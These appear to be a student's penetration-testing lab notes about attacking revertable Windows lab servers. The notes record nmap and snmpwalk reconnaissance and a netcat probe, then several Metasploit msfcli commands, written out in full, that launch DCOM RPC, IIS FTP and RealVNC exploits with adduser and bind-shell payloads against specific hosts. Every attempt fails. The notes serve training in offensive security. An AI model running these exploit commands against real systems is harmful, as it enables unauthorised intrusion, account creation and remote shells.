1. Using nmap to gather information about 192.168.13.201

1. 1. Using nmap to gather information about 192.168.13.201. Obviously this server is getting a shit load of scanning, thus nmap sometimes repo
2. rt that this server is down.
3. 2. Previously gather information shows that most windows servers has port 135 enable. Checks msfcli reveals the following:
4. ./msfcli |grep windows -i|grep rpc -i
5. exploit/windows/brightstor/mediasrv_sunrpc CA BrightStor ArcServe Media Service Stack Buffer Overflow
6. exploit/windows/dcerpc/ms03_026_dcom Microsoft RPC DCOM Interface Overflow exploit/windows/dcerpc/ms05_017_msmq Microsoft Message Queueing Service Path Overflow
7. exploit/windows/dcerpc/ms07_065_msmq Microsoft Message Queueing Service DNS Name Path Overflow
8. exploit/windows/dcerpc/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)
9. exploit/windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
10. exploit/windows/smb/netidentity_xtierrpcpipe Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overf
11. low.
12. 3. Try the 2nd one - DCOM Interface Overflow:
13. ./msfcli exploit/windows/dcerpc/ms03_026_dcom P
14. ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser O ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 C
15. 3.a this command reponses that server 231 isn't supported
16. ./msfcli exploit/windows/dcerpc/ms03_026_dcom PAYLOAD=windows/adduser RHOST=192.168.13.231 E
17. Exploit failed: DCERPC FAULT => nca_s_fault_access_denied
18. 3.b I ignore the failed check and go ahead to try to sent the payload. Failed as expected. I do realize that in real life situation this wou
19. ld crash the server process, but with the lab servers being revertable I decided to go ahead. 4. Looking at the NMAP results for other clues. I picked 227 server, it seems to have lower versions of softwares.
20. 5. a snmpwalk feels like the first choice: results are: 227_ports.log 227_services.log 227_software.log and 227_users.log
21. 6. the "nc.exe" service and port 4444 being lisenning to reveals that this server might has been compromised.
22. 7. nc -vv 192.168.13.227 4444 returns "connection refused" error. My guess is that somebody is having a remote shell? I should use other por
23. ts if I am getting the shell then.
24. 8. 192.168.12.65 is the guy who is connecting to this port. He also connects to the 1352 port. No luck on nc to that port either.
25. 9. the service metsvc.exe agrees that this is a compromised server running meterpreter.
26. 10. The server name is in its netbios, as SRV2
27. 11. Let's look at the M$ ESMTP service.
28. ./msfcli |grep -i ESMTP - got nothing
29. 12. Looking at the ftpd service.
30. ./msfcli exploit/windows/ftp/microsoft_ftpd_nlst PAYLOAD=windows/shell_bind_tcp FTPUSER=ftp FTPPASS=ftp@ftp.com RHOST=192.168.13.227
31. LPORT=4325 E
32. 13. No luck, 550 GQCYLIOBRL: Access is denied. The root directory of the FTP server is not writeable. I might came back here when I got an account that has file system access.
33. 14. Now try RealVNC. Apprently there is only one exploit exist but it's client side for the view thus no luck either
34. 14b. Well, it appears that MSF2 has something special for realVNC... realvnc_41_bypass
35. ./msfcli realvnc_41_bypass LHOST=127.0.0.1 RHOST=192.168.13.227 RPORT=5900 E
36. Why LHOST has to be 127.0.0.1 ?? but after the tightVNC viewer show up, windows ask to password to login again...
37. 15. Found two exploits for port 135:
38. http://www.metasploit.com/modules/exploit/windows/dcerpc/ms03_026_dcom
39. payload can be sent without any responses. Adduser payload failed.
40. 16. Using nmap to banner grab ports from snmpwalk one by one, discovered http://192.168.13.227:6532 web service but only limited to certain ip addresses.
41. 17. Try IIS 5.0 exploits in MSF2 and MSF3, countless fails.